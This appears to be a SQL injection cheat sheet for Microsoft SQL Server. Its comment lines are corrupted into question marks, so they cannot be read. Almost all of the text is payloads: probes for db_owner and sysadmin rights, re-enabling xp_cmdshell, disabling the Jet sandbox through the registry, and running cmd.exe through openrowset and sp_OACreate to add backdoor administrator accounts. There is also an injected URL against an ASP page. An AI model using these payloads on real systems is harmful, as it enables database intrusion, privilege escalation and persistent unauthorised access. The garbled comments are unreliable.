????//????????????
????and 1=(Select IS_MEMBER('db_owner'))
????And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
????//???????ж????????????
????and 1= (Select HAS_DBACCESS('master'))
????And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
????????????
????and char(124)%2Buser%2Bchar(124)=0
???????????
????' and char(124)%2Buser%2Bchar(124)=0 and ''='
????????????
????' and char(124)%2Buser%2Bchar(124)=0 and '%'='
???????????
????and user>0
????' and user>0 and ''='
???????????SA???
????and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
????And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
????????????MSSQL?????
????and exists (select * from sysobjects);--
????????????????
????;declare @d int;--
??????? xp_cmdshell
????;exec master..dbo.sp_addextendedproc 'xp_cmdshell'??'xplog70.dll';--
????select * from openrowset('sqloledb'??'server=192.168.1.200??1433;uid=test;pwd=pafpaf'??'select @@version')
????//-----------------------
????//      ???????
????//-----------------------
??????????????????
????exec master..xp_regwrite 'HKEY_LOCAL_MACHINE'??'SOFTWAREMicrosoftJet4.0Engines'??'SandBoxMode'??'REG_DWORD'??1
???????????jet.oledb?????????
????select * from openrowset('microsoft.jet.oledb.4.0'??';database=c:winntsystem32iasias.mdb'??'select shell("cmd.exe /c net user admin admin1234 /add")')
???????????
????;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell'??@shell OUTPUT EXEC SP_OAMETHOD @shell??'run'??null?? 'C:WINNTsystem32cmd.exe /c net user paf pafpaf /add';--
????EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:1111'
?????ж?xp_cmdshell????洢???????????
????http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')